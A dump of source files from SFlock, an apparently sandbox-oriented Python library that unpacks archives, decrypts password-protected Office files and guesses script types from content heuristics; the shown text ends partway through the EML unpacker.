https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/sflock/data/win32/zlib1.dll


--------------------------------------------------------------------------------
/sflock/data/win64/libgnurx-0.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/sflock/data/win64/libgnurx-0.dll


--------------------------------------------------------------------------------
/sflock/data/win64/magic.mgc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/sflock/data/win64/magic.mgc


--------------------------------------------------------------------------------
/sflock/data/win64/magic1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/sflock/data/win64/magic1.dll


--------------------------------------------------------------------------------
/sflock/data/zipjail.elf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/sflock/data/zipjail.elf


--------------------------------------------------------------------------------
/sflock/decode/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2017 Jurriaan Bremer.
2 | # This file is part of SFlock - http://www.sflock.org/.
3 | # See the file 'docs/LICENSE.txt' for copying permission.
4 | 
5 | from sflock.abstracts import Decoder
6 | from sflock.misc import import_plugins
7 | 
8 | plugins = import_plugins(__file__, "sflock.decode", globals(), Decoder)
9 | 


--------------------------------------------------------------------------------
/sflock/decode/office.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
  2 | # This file is part of SFlock - http://www.sflock.org/.
  3 | # See the file 'docs/LICENSE.txt' for copying permission.
  4 | 
  5 | import base64
  6 | import hashlib
  7 | import struct
  8 | import xml.dom.minidom
  9 | 
 10 | from cryptography.hazmat.backends import default_backend
 11 | from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
 12 | 
 13 | from sflock.abstracts import Decoder, File
 14 | 
 15 | class EncryptedInfo(object):
 16 |     key_data_salt = None
 17 |     key_data_hash_alg = None
 18 |     verifier_hash_input = None
 19 |     verifier_hash_value = None
 20 |     encrypted_key_value = None
 21 |     spin_value = None
 22 |     password_salt = None
 23 |     password_hash_alg = None
 24 |     password_key_bits = None
 25 | 
 26 | class Office(Decoder):
 27 |     name = "office"
 28 | 
 29 |     def init(self):
 30 |         self.secret_key = None
 31 |         self.verifier_hash_input = None
 32 |         self.verifier_hash_value = None
 33 | 
 34 |     def get_hash(self, value, algorithm):
 35 |         if algorithm == "SHA512":
 36 |             return hashlib.sha512(value).digest()
 37 |         else:
 38 |             return hashlib.sha1(value).digest()
 39 | 
 40 |     def gen_encryption_key(self, block):
 41 |         if isinstance(self.password, bytes):
 42 |             self.password = self.password.decode()
 43 | 
 44 |         # Initial round sha512(salt + password).
 45 |         h = self.get_hash(
 46 |             self.ei.password_salt + str(self.password).encode("utf-16le"),
 47 |             self.ei.password_hash_alg
 48 |         )
 49 | 
 50 |         # Iteration of 0 -> spincount-1; hash = sha512(iterator + hash).
 51 |         for i in range(self.ei.spin_value):
 52 |             h = self.get_hash(
 53 |                 struct.pack("<I", i) + h, self.ei.password_hash_alg
 54 |             )
 55 | 
 56 |         # Final skey and truncation.
 57 |         h = self.get_hash(h + block, self.ei.password_hash_alg)
 58 |         skey = h[:self.ei.password_key_bits // 8]
 59 |         return skey
 60 | 
 61 |     def init_secret_key(self):
 62 |         # TODO Add support for private keys.
 63 |         if False:
 64 |             # rsa = PKCS1_v1_5.new(RSA.importKey(self._private_key))
 65 |             # self.secret_key = rsa.decrypt(self.ei.encrypted_key_value, None)
 66 |             # Presumably the following is correct.
 67 |             # self.verifier_hash_input = rsa.decrypt(
 68 |                 # self.ei.verifier_hash_input, None
 69 |             # )
 70 |             # self.verifier_hash_value = rsa.decrypt(
 71 |                 # self.ei.verifier_hash_value, None
 72 |             # )
 73 |             pass
 74 | 
 75 |         if self.password:
 76 |             block_verifier_input = bytearray([
 77 |                 0xfe, 0xa7, 0xd2, 0x76, 0x3b, 0x4b, 0x9e, 0x79
 78 |             ])
 79 |             block_verifier_value = bytearray([
 80 |                 0xd7, 0xaa, 0x0f, 0x6d, 0x30, 0x61, 0x34, 0x4e
 81 |             ])
 82 |             block_encrypted_key = bytearray([
 83 |                 0x14, 0x6e, 0x0b, 0xe7, 0xab, 0xac, 0xd0, 0xd6,
 84 |             ])
 85 | 
 86 |             # AES decrypt the encrypted* values with their pre-defined block
 87 |             # keys and salt in order to get secret key.
 88 |             aes = Cipher(
 89 |                 algorithms.AES(self.gen_encryption_key(block_verifier_input)),
 90 |                 modes.CBC(self.ei.password_salt),
 91 |                 backend=default_backend()
 92 |             ).decryptor()
 93 |             self.verifier_hash_input = aes.update(
 94 |                 self.ei.verifier_hash_input
 95 |             ) + aes.finalize()
 96 | 
 97 |             aes = Cipher(
 98 |                 algorithms.AES(self.gen_encryption_key(block_verifier_value)),
 99 |                 modes.CBC(self.ei.password_salt),
100 |                 backend=default_backend()
101 |             ).decryptor()
102 |             self.verifier_hash_value = aes.update(
103 |                 self.ei.verifier_hash_value
104 |             ) + aes.finalize()
105 | 
106 |             aes = Cipher(
107 |                 algorithms.AES(self.gen_encryption_key(block_encrypted_key)),
108 |                 modes.CBC(self.ei.password_salt),
109 |                 backend=default_backend()
110 |             ).decryptor()
111 |             self.secret_key = (
112 |                 aes.update(self.ei.encrypted_key_value) + aes.finalize()
113 |             )
114 | 
115 |     def decrypt_blob(self, f):
116 |         ret = []
117 |         # TODO Ensure that the assumption of "total size" being a 64-bit
118 |         # integer is correct?
119 |         for idx in range(0, struct.unpack("Q", f.read(8))[0], 0x1000):
120 |             iv = self.get_hash(
121 |                 self.ei.key_data_salt + struct.pack("<I", idx),
122 |                 self.ei.key_data_hash_alg
123 |             )
124 |             aes = Cipher(
125 |                 algorithms.AES(self.secret_key),
126 |                 modes.CBC(iv[:16]),
127 |                 backend=default_backend()
128 |             ).decryptor()
129 |             ret.append(aes.update(f.read(0x1000)) + aes.finalize())
130 |         return File(contents=b"".join(ret))
131 | 
132 |     def decode(self):
133 |         if not self.f.ole:
134 |             return
135 | 
136 |         if ["EncryptionInfo"] not in self.f.ole.listdir():
137 |             return
138 | 
139 |         try:
140 |             info = xml.dom.minidom.parseString(
141 |                 self.f.ole.openstream("EncryptionInfo").read()[8:]
142 |             )
143 |         except xml.parsers.expat.ExpatError:
144 |             return
145 | 
146 |         key_data = info.getElementsByTagName("keyData")[0]
147 |         password = info.getElementsByTagName("p:encryptedKey")[0]
148 | 
149 |         self.ei = ei = EncryptedInfo()
150 |         ei.key_data_salt = base64.b64decode(
151 |             key_data.getAttribute("saltValue")
152 |         )
153 |         ei.key_data_hash_alg = key_data.getAttribute("hashAlgorithm")
154 |         ei.verifier_hash_input = base64.b64decode(
155 |             password.getAttribute("encryptedVerifierHashInput")
156 |         )
157 |         ei.verifier_hash_value = base64.b64decode(
158 |             password.getAttribute("encryptedVerifierHashValue")
159 |         )
160 |         ei.encrypted_key_value = base64.b64decode(
161 |             password.getAttribute("encryptedKeyValue")
162 |         )
163 |         ei.spin_value = int(password.getAttribute("spinCount"))
164 |         ei.password_salt = base64.b64decode(
165 |             password.getAttribute("saltValue")
166 |         )
167 |         ei.password_hash_alg = password.getAttribute("hashAlgorithm")
168 |         ei.password_key_bits = int(password.getAttribute("keyBits"))
169 | 
170 |         self.init_secret_key()
171 | 
172 |         verifier_hash = self.get_hash(
173 |             self.verifier_hash_input, self.ei.password_hash_alg
174 |         )
175 |         # Incorrect password.
176 |         if verifier_hash != self.verifier_hash_value:
177 |             return False
178 | 
179 |         return self.decrypt_blob(self.f.ole.openstream("EncryptedPackage"))
180 | 


--------------------------------------------------------------------------------
/sflock/deps.md:
--------------------------------------------------------------------------------
 1 | 
 2 | `microsoft_word`: needs microsoft word to run.
 3 | 
 4 | `microsoft_powerpoint`: needs microsoft powerpoint to run.
 5 | 
 6 | `microsoft_excel`: needs microsoft excel to run.
 7 | 
 8 | `microsoft_dotnet`: needs dotnet framework to run.
 9 | 
10 | 
11 | `python`: needs python to run.
12 | 
13 | `ruby`: needs a ruby interpreter to run.
14 | 
15 | `perl`: needs perl to run.
16 | 
17 | `powershell`: needs powershell to run.
18 | 
19 | 
20 | `oracle_java`: needs java from oracle to run
21 | 
22 | `acrobat_reader`: needs acrobat reader from Adobe to run.
23 | 
24 | `mediaplayer`: needs a mediaplayer to run, for audio and video files.
25 | 
26 | `flash`: needs Adobe flash to run.
27 | 
28 | `quicktime`: needs quikctime player to run.
29 | 
30 | 
31 | `unarchive`: needs an unarchiver to run. Like winrar.
32 | 
33 | `ace`: needs ace archiver to run.
34 | 
35 | `arc`: needs arc archiver to run.
36 | 


--------------------------------------------------------------------------------
/sflock/errors.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2021 Hatching B.V.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | class Errors:
 6 |     NO_ERROR = None
 7 |     NOT_SUPPORTED = "failed_not_supported"
 8 |     MISSING_DEPENDENCY = "failed_missing_dependency"
 9 |     DECRYPTION_FAILED = "failed_decryption_failed"
10 |     INVALID_ARCHIVE = "failed_invalid_archive"
11 |     UNPACK_FAILED = "failed_unpacking"
12 |     NOTHING_EXTRACTED = "failed_nothing_extracted"
13 |     CANCELLED_SYMLINK = "cancelled_malicious_symlink"
14 |     TOTAL_TOO_LARGE = "cancelled_total_size_too_large"
15 |     CANCELLED_DIR_TRAVERSAL = "cancelled_directory_traversal"
16 |     ZIPJAIL_FAIL = "failed_zipjail_error"
17 | 


--------------------------------------------------------------------------------
/sflock/exception.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | class SflockException(Exception):
 6 |     pass
 7 | 
 8 | class IncorrectUsageException(SflockException):
 9 |     pass
10 | 
11 | class UnpackException(SflockException):
12 | 
13 |     def __init__(self, message, state=None):
14 |         self.state = state
15 |         super().__init__(message)
16 | 
17 | class NotSupportedError(UnpackException):
18 |     pass
19 | 
20 | class DecryptionFailedError(UnpackException):
21 |     pass
22 | 
23 | class IncorrectPasswordException(DecryptionFailedError):
24 |     pass
25 | 
26 | class DecoderException(SflockException):
27 |     pass
28 | 
29 | class MaxNestedError(SflockException):
30 |     pass
31 | 


--------------------------------------------------------------------------------
/sflock/ident.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
  2 | # This file is part of SFlock - http://www.sflock.org/.
  3 | # See the file 'docs/LICENSE.txt' for copying permission.
  4 | 
  5 | import re
  6 | 
  7 | def hta(f):
  8 |     headstart = re.search(
  9 |         rb"<[\s+]{0,128}head[\s+]{0,128}", f.contents, re.I
 10 |     )
 11 |     if not headstart:
 12 |         return
 13 | 
 14 |     if not re.compile(
 15 |         rb"<[\s+]{0,1024}hta:application[\s+]{0,1024}", re.I
 16 |     ).search(f.contents, headstart.end()):
 17 |         return
 18 | 
 19 |     STRINGS = [
 20 |         b"<title", b"<body", b"SINGLEINSTANCE",
 21 |         b"<script", b"<input", b"WINDOWSTATE",
 22 |         b"APPLICATIONNAME", b"SCROLL"
 23 |     ]
 24 |     for string in STRINGS:
 25 |         if string in f.contents[headstart.end():]:
 26 |             return "hta"
 27 | 
 28 | def office_webarchive(f):
 29 |     STRINGS = [
 30 |         b"<o:Pages>", b"<o:DocumentProperties>", b"<o:Words>",
 31 |         b"<o:Characters>", b"<o:Lines>", b"<o:Paragraphs>",
 32 |         b"Content-Location:", b"Content-Transfer-Encoding:",
 33 |         b"Content-Type:", b"<o:OfficeDocumentSettings>"
 34 |     ]
 35 | 
 36 |     MANDATORY_STRINGS = [
 37 |         b"MIME-Version:", b"------=_NextPart_", b"<w:WordDocument>",
 38 |         b"text/html",
 39 |     ]
 40 | 
 41 |     # Make sure all mandatory strings are found
 42 |     for string in MANDATORY_STRINGS:
 43 |         if string not in f.contents:
 44 |             return
 45 | 
 46 |     found = 0
 47 |     for string in STRINGS:
 48 |         found += f.contents.count(string)
 49 | 
 50 |     if found >= 10:
 51 |         return "doc"
 52 | 
 53 | def office_activemime(f):
 54 |     if f.contents.startswith((b"QWN0aXZlTWltZQ", b"ActiveMime")):
 55 |         return "doc"
 56 | 
 57 | def powershell(f):
 58 |     POWERSHELL_STRS = [
 59 |         b"$PSHOME", b"Get-WmiObject", b"Write-", b"new-object ",
 60 |         b"Start-Process", b"Copy-Item", b"Set-ItemProperty", b"Select-Object",
 61 |         b"New-Object ", b"Write-Error ", b"Write-Warning ", b"Invoke-Method ",
 62 |         b"Invoke-Expression ", b"Parameter(", b"Invoke-Item "
 63 |     ]
 64 | 
 65 |     found = 0
 66 |     for s in POWERSHELL_STRS:
 67 |         if s in f.contents:
 68 |             found += 1
 69 | 
 70 |     if found >= 2:
 71 |         return "ps1"
 72 | 
 73 | def ruby(f):
 74 |     RB_STRS = [
 75 |         b"puts", b"END", b"START", b"require", b"ruby",
 76 |         b"end", b"load"
 77 |     ]
 78 | 
 79 |     found = 0
 80 |     for s in RB_STRS:
 81 |         if s in f.contents:
 82 |             found += 1
 83 | 
 84 |     if found > 3:
 85 |         return "rb"
 86 | 
 87 | def javascript(f):
 88 |     JS_STRS = [
 89 |         b"function ", b"eval", b" true",
 90 |         b" false", b" null", b"Math.", b"alert(", b"typeof ",
 91 |         b"instanceof "
 92 |     ]
 93 | 
 94 |     found = 0
 95 |     for s in JS_STRS:
 96 |         if s in f.contents:
 97 |             found += 1
 98 | 
 99 |     varcount = f.contents.count(b"var ")
100 |     if varcount >= 10:
101 |         found += 3
102 |     elif varcount >= 4:
103 |         found += 2
104 |     elif varcount > 0:
105 |         found += 1
106 | 
107 |     if found >= 4:
108 |         return "js"
109 | 
110 | def wsf(f):
111 |     # Search for a <job id='something'> tag. Keep in mind the tag might be
112 |     # something like '<  JoB     id=''>'. Limit the amount of whitespace to
113 |     # match, otherwise it is unlimited.
114 |     jobstart = re.search(
115 |         rb"<[\s+]{0,1024}job[\s+]{0,1024}id=", f.contents, re.I
116 |     )
117 |     if not jobstart:
118 |         return
119 | 
120 |     # The script should come after the job tag.
121 |     # @todo
122 |     # handle this <script id="OIddGOjUGdfolHCdIGVfgOojC" language="VBScript">
123 |     # currently doing it by .{0,256}, kind hacky
124 | 
125 |     if re.compile(
126 |             rb"<script.{0,256}\s+language=[\"\'](J|VB|Perl)Script", re.I
127 |     ).search(f.contents, jobstart.end()):
128 |         return "wsf"
129 | 
130 |     return
131 | 
132 | def visualbasic(f):
133 |     VB_STRS = [
134 |         b"Dim ", b"Set ", b"Attribute ", b"Public ",
135 |         b"#If", b"#Else", b"#End If", b"End Function",
136 |         b"End Sub", b"VBA", b"Execute(", b"End if", b"Else",
137 |         b"Exit Function", b"Is Nothing", b"Loop ", b"Loop\n",
138 |         b"Do Until ", b"Chr(", b"Function ", b"Sub ", b"ElseIf ", b"End Sub"
139 |     ]
140 | 
141 |     found = 0
142 |     for s in VB_STRS:
143 |         if s in f.contents:
144 |             found += 1
145 | 
146 |     if found >= 4:
147 |         return "vbs"
148 |     return
149 | 
150 | def java(f):
151 |     if not f.get_child(r".*\.class$", regex=True) \
152 |             and not f.get_child("META-INF/MANIFEST.MF"):
153 |         return
154 |     if f.get_child("AndroidManifest.xml"):
155 |         return "apk"
156 |     return "jar"
157 | 
158 | def python(f):
159 |     PY_STRS = [
160 |         b"():", b"def ", b"#", b"print(", b"sleep(", b"time.sleep(",
161 |         b"ctypes", b"exec(", b"eval(", b"elif:", b"b64decode", b"os.", b"sys.",
162 |         b"bytes(", b".encode("
163 |     ]
164 | 
165 |     found = 0
166 |     for s in PY_STRS:
167 |         if s in f.contents:
168 |             found += 1
169 | 
170 |     from_import = re.compile(rb"from[\s+]{1,5}[\S+]{1,50}[\s+]{1,5}import\s")
171 |     direct_import = re.compile(rb"import[\s+]{1,5}[\S+]{1,50}")
172 | 
173 |     # Count from and import statements. Only regex search first X bytes of file
174 |     limit = 1024 * 1024 * 2
175 |     all_froms = len(from_import.findall(f.contents, 0, limit))
176 |     all_directs = len(direct_import.findall(f.contents, 0, limit))
177 | 
178 |     if all_froms >= 4:
179 |         found += 3
180 |     elif all_froms > 0:
181 |         found += 2
182 | 
183 |     if all_directs:
184 |         if all_froms:
185 |             # 'import' statements are part of 'from X import Y' statements.
186 |             # Subtract their amount.
187 |             all_directs -= all_froms
188 | 
189 |         if all_directs >= 4:
190 |             found += 3
191 |         elif all_directs > 0:
192 |             found += 1
193 | 
194 |     if found >= 4:
195 |         return "py"
196 | 
197 | def batch(f):
198 |     BC_STRS = [
199 |         b"@echo ", b"@setlocal ", b"@exit ", b"set ", b"@pause ",
200 |         b":init", b":parse", b"goto ", b"schtasks ",
201 |         b":main", b"shift", b"start ", b"taskkill ", b":: ",
202 |         b"rem ", b"cls ", b"setlocal", b"exit ", b"sleep ", b"assoc ",
203 |         b"xcopy ", b"copy ", b"ipconfig", b"attrib ", b"del ", b"call :"
204 |     ]
205 | 
206 |     found = 0
207 |     for s in BC_STRS:
208 |         if re.search(s, f.contents, re.IGNORECASE):
209 |             found += 1
210 | 
211 |     if found >= 5:
212 |         return "bat"
213 | 
214 | def udf_token_search(f):
215 |     """Tries to detect UDF filesystem.
216 |     See https://wiki.osdev.org/UDF"""
217 |     beaoffset = f.contents.find(b"BEA01")
218 |     if beaoffset == -1:
219 |         return False
220 | 
221 |     if f.contents.find(b"NSR02", beaoffset) != -1:
222 |         return True
223 | 
224 |     if f.contents.find(b"NSR03", beaoffset) != -1:
225 |         return True
226 | 


--------------------------------------------------------------------------------
/sflock/main.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | from __future__ import print_function
 6 | 
 7 | import click
 8 | import glob
 9 | import io
10 | import json
11 | import os.path
12 | import re
13 | import zipfile
14 | 
15 | from sflock.abstracts import File, Unpacker
16 | from sflock.exception import IncorrectUsageException
17 | from sflock.misc import make_list
18 | from sflock.unpack import plugins
19 | 
20 | def supported():
21 |     """Returns the supported extensions for this machine. Support for the
22 |     unpacking of numerous file extensions depends on different system packages
23 |     which should be installed on the machine."""
24 |     ret = []
25 |     for plugin in plugins.values():
26 |         if plugin(None).supported():
27 |             for ext in make_list(plugin.exts):
28 |                 ret.append(ext)
29 |     return ret
30 | 
31 | def ident(f):
32 |     """Identifies a file based on its contents."""
33 |     for child in f.children:
34 |         ident(child)
35 | 
36 | def unpack(filepath=None, contents=None, password=None, filename=None,
37 |            duplicates=None):
38 |     """Unpacks the file or contents provided."""
39 |     if duplicates is None:
40 |         duplicates = []
41 | 
42 |     if isinstance(filepath, bytes) or isinstance(contents, str):
43 |         raise IncorrectUsageException
44 | 
45 |     if isinstance(filename, bytes) or isinstance(password, bytes):
46 |         raise IncorrectUsageException
47 | 
48 |     if contents:
49 |         f = File(filepath, contents, filename=filename)
50 |     else:
51 |         f = File.from_path(filepath, filename=filename)
52 | 
53 |     Unpacker.single(f, password, duplicates)
54 | 
55 |     ident(f)
56 |     return f
57 | 
58 | def zipify(f):
59 |     """Turns any type of archive into an equivalent .zip file."""
60 |     r = io.BytesIO()
61 |     z = zipfile.ZipFile(r, "w")
62 | 
63 |     for child in f.children:
64 |         # Avoid specific characters that aren't allowed under Windows NTFS.
65 |         if re.search('["*<>?]', child.relapath):
66 |             continue
67 |         filepath = child.temp_path()
68 |         z.write(filepath, child.relapath)
69 |         os.unlink(filepath)
70 | 
71 |     z.close()
72 |     return r.getvalue()
73 | 
74 | def process_file(filepath, extract):
75 |     f = unpack(filepath)
76 |     print(json.dumps(f.astree()))
77 | 
78 |     extract and f.extract(extract)
79 | 
80 | def process_directory(dirpath, extract):
81 |     for rootpath, directories, filenames in os.walk(dirpath):
82 |         for filename in filenames:
83 |             process_file(os.path.join(rootpath, filename), extract)
84 | 
85 | @click.command()
86 | @click.argument("files", nargs=-1)
87 | @click.option("-e", "--extract", type=click.Path(file_okay=False))
88 | def main(files, extract):
89 |     for pattern in files:
90 |         for path in glob.iglob(pattern):
91 |             if os.path.isdir(path):
92 |                 process_directory(path, extract)
93 |             else:
94 |                 process_file(path, extract)
95 | 


--------------------------------------------------------------------------------
/sflock/misc.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import importlib
 6 | import os
 7 | 
 8 | import sflock
 9 | 
10 | def import_plugins(dirpath, module_prefix, namespace, class_):
11 |     """Import plugins of type `class` located at `dirpath` into the
12 |     `namespace` that starts with `module_prefix`. If `dirpath` represents a
13 |     filepath then it is converted into its containing directory."""
14 |     if os.path.isfile(dirpath):
15 |         dirpath = os.path.dirname(dirpath)
16 | 
17 |     for fname in os.listdir(dirpath):
18 |         if fname.endswith(".py") and not fname.startswith("__init__"):
19 |             module_name, _ = os.path.splitext(fname)
20 |             importlib.import_module("%s.%s" % (module_prefix, module_name))
21 | 
22 |     plugins = {}
23 |     for subclass in class_.__subclasses__():
24 |         namespace[subclass.__name__] = subclass
25 |         plugins[subclass.name.lower()] = subclass
26 |         class_.plugins[subclass.name.lower()] = subclass
27 |     return plugins
28 | 
29 | def data_file(*path):
30 |     """Return the path for the filepath of an embedded file."""
31 |     dirpath = sflock.__path__[0]
32 |     return os.path.abspath(os.path.join(dirpath, "data", *path))
33 | 
34 | def make_list(obj):
35 |     if isinstance(obj, (tuple, list)):
36 |         return list(obj)
37 |     return [obj]
38 | 


--------------------------------------------------------------------------------
/sflock/unpack/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2015-2016 Jurriaan Bremer.
2 | # This file is part of SFlock - http://www.sflock.org/.
3 | # See the file 'docs/LICENSE.txt' for copying permission.
4 | 
5 | from sflock.abstracts import Unpacker
6 | from sflock.misc import import_plugins
7 | 
8 | plugins = import_plugins(__file__, "sflock.unpack", globals(), Unpacker)
9 | 


--------------------------------------------------------------------------------
/sflock/unpack/ace.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016 Jurriaan Bremer.
 2 | # Copyright (C) 2018 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | import os
 7 | import shutil
 8 | import tempfile
 9 | 
10 | from sflock.abstracts import Unpacker
11 | 
12 | class AceFile(Unpacker):
13 |     name = "acefile"
14 |     exe = "/usr/bin/unace"
15 |     exts = ".ace"
16 |     magic = "ACE archive"
17 |     dependency = "unace-nonfree"
18 | 
19 |     def unpack(self, depth=0, password=None, duplicates=None):
20 |         dirpath = tempfile.mkdtemp()
21 | 
22 |         self.f.archive = True
23 |         if self.f.filepath:
24 |             filepath = os.path.abspath(self.f.filepath)
25 |             temporary = False
26 |         else:
27 |             filepath = self.f.temp_path(".ace")
28 |             temporary = True
29 | 
30 |         symlink = None
31 |         if not filepath.endswith(".ace"):
32 |             symlink = tempfile.mkdtemp()
33 |             new_filepath = os.path.join(symlink, "temp.ace")
34 |             os.symlink(filepath, new_filepath)
35 |             filepath = new_filepath
36 | 
37 |         ret = self.zipjail(
38 |             filepath, dirpath, "x", filepath, dirpath + os.sep
39 |         )
40 | 
41 |         if symlink:
42 |             shutil.rmtree(symlink)
43 | 
44 |         if not ret:
45 |             return []
46 | 
47 |         if temporary:
48 |             os.unlink(filepath)
49 | 
50 |         return self.process_directory(dirpath, duplicates, depth)
51 | 


--------------------------------------------------------------------------------
/sflock/unpack/bup.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import ntpath
 6 | import configparser
 7 | 
 8 | from sflock.abstracts import Unpacker, File
 9 | from sflock.errors import Errors
10 | 
11 | class BupFile(Unpacker):
12 |     name = "bupfile"
13 |     exts = ".bup"
14 | 
15 |     def supported(self):
16 |         return True
17 | 
18 |     def handles(self):
19 |         if super(BupFile, self).handles():
20 |             return True
21 | 
22 |         if self.f.ole and ["Details"] in self.f.ole.listdir():
23 |             return True
24 |         return False
25 | 
26 |     def decrypt(self, content):
27 |         return b"".join(b"%c" % (ch ^ 0x6a) for ch in content)
28 | 
29 |     def unpack(self, depth=0,  password=None, duplicates=None):
30 |         entries = []
31 | 
32 |         if not self.f.ole:
33 |             self.f.set_error(Errors.UNPACK_FAILED, "No OLE structure found")
34 |             return []
35 | 
36 |         if ["Details"] not in self.f.ole.listdir():
37 |             return []
38 | 
39 |         details = self.decrypt(
40 |             bytearray(self.f.ole.openstream("Details").read())
41 |         )
42 | 
43 |         config = configparser.ConfigParser()
44 |         config.read_string(details.decode())
45 | 
46 |         ole = self.f.ole
47 | 
48 |         for filename in ole.listdir():
49 |             if filename[0] == "Details" or not ole.get_size(filename[0]):
50 |                 continue
51 | 
52 |             relapath = ntpath.basename(
53 |                 config.get(filename[0], "OriginalName")
54 |             )
55 | 
56 |             entries.append(File(
57 |                 relapath=relapath,
58 |                 contents=self.decrypt(
59 |                     bytearray(ole.openstream(filename[0]).read())
60 |                 )
61 |             ))
62 | 
63 |         return self.process(entries, duplicates, depth)
64 | 


--------------------------------------------------------------------------------
/sflock/unpack/cab.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
 2 | # Copyright (C) 2018 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | import os
 7 | import tempfile
 8 | 
 9 | from sflock.abstracts import Unpacker
10 | 
11 | class CabFile(Unpacker):
12 |     name = "cabfile"
13 |     exe = "/usr/bin/cabextract"
14 |     exts = ".cab"
15 |     magic = "Microsoft Cabinet archive"
16 |     dependency = "cabextract"
17 | 
18 |     def unpack(self, depth=0,  password=None, duplicates=None):
19 |         dirpath = tempfile.mkdtemp()
20 | 
21 |         if self.f.filepath:
22 |             filepath = os.path.abspath(self.f.filepath)
23 |             temporary = False
24 |         else:
25 |             filepath = self.f.temp_path(".cab")
26 |             temporary = True
27 | 
28 |         ret = self.zipjail(
29 |             filepath, dirpath, "-d%s" % dirpath, filepath
30 |         )
31 |         if not ret:
32 |             return []
33 | 
34 |         if temporary:
35 |             os.unlink(filepath)
36 | 
37 |         return self.process_directory(dirpath, duplicates, depth)
38 | 


--------------------------------------------------------------------------------
/sflock/unpack/daa.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2019 Hatching B.V.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import os
 6 | import tempfile
 7 | 
 8 | from sflock.abstracts import Unpacker
 9 | from sflock.misc import data_file
10 | 
11 | class DaaFile(Unpacker):
12 |     name = "daafile"
13 |     exts = ".daa"
14 |     magic = "PowerISO Direct-Access-Archive"
15 | 
16 |     def __init__(self, *args, **kwargs):
17 |         super(DaaFile, self).__init__(*args, **kwargs)
18 |         self.exe = data_file("poweriso.elf")
19 | 
20 |     def unpack(self, depth=0,  password=None, duplicates=None):
21 |         dirpath = tempfile.mkdtemp()
22 | 
23 |         if self.f.filepath:
24 |             filepath = os.path.abspath(self.f.filepath)
25 |             temporary = False
26 |         else:
27 |             filepath = self.f.temp_path(".daa")
28 |             temporary = True
29 | 
30 |         ret = self.zipjail(
31 |             filepath, dirpath, "extract",
32 |             filepath, "/", "-od", dirpath
33 |         )
34 |         if temporary:
35 |             os.unlink(filepath)
36 | 
37 |         if not ret:
38 |             return []
39 |         return self.process_directory(dirpath, duplicates, depth)
40 | 


--------------------------------------------------------------------------------
/sflock/unpack/eml.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import email
 6 | import email.header
 7 | import re
 8 | 
 9 | from sflock.abstracts import Unpacker, File
10 | 
11 | class EmlFile(Unpacker):
12 |     name = "emlfile"
13 |     exts = ".eml", ".mht"
14 |     magic = ("news or mail", "SMTP mail", "MIME entity")
15 | 
16 |     whitelisted_content_type = [
17 |         "text/plain", "text/html",
18 |     ]
19 | 
20 |     def supported(self):
21 |         return True
22 | 
23 |     def handles(self):
24 |         if super(EmlFile, self).handles():
25 |             return True
26 | 
27 |         stream = self.f.stream
28 |         keys = []
29 |         for _ in range(10):
30 |             line = stream.readline()
31 |             if b":" in line:
32 |                 keys.append(line.split(b":")[0])
33 |         if b"From" in keys and b"To" in keys:
34 |             return True
35 |         return False
36 | 
37 |     def real_unpack(self, password, duplicates):
38 |         entries = []
39 | 
40 |         e = email.message_from_string(self.f.contents.decode("latin-1"))
41 | 
42 |         for part in e.walk():
43 |             if part.is_multipart():
44 |                 continue
45 | 
46 |             if not part.get_filename() and \
47 |                     part.get_content_type() in self.whitelisted_content_type:
48 |                 continue
49 | 
50 |             payload = part.get_payload(decode=True)
51 |             if not payload:
52 |                 continue
53 | 
54 |             filename = part.get_filename()
55 | 
56 |             if filename:
57 |                 filename = email.header.make_header(
58 |                     email.header.decode_header(filename)
59 |                 )
60 |                 filename = str(filename)
61 | 
